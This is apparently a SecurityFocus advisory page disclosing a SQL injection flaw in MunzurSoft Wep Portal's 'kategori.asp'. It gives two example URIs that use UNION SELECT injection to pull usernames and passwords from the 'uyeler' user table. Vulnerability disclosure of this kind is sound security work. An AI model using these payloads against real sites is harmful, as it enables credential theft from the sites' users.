Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

MunzurSoft Wep Portal 'kategori.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/www/kategori.asp?kat=2%20union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler

http://ewww.example.com/kategori.asp?kat=3+union+select+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler+WHERE+U_ID=1<http://www.example.com/kategori.asp?kat=3+union+select+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler+WHERE+U_ID=1>







 

Privacy Statement
Copyright 2008, SecurityFocus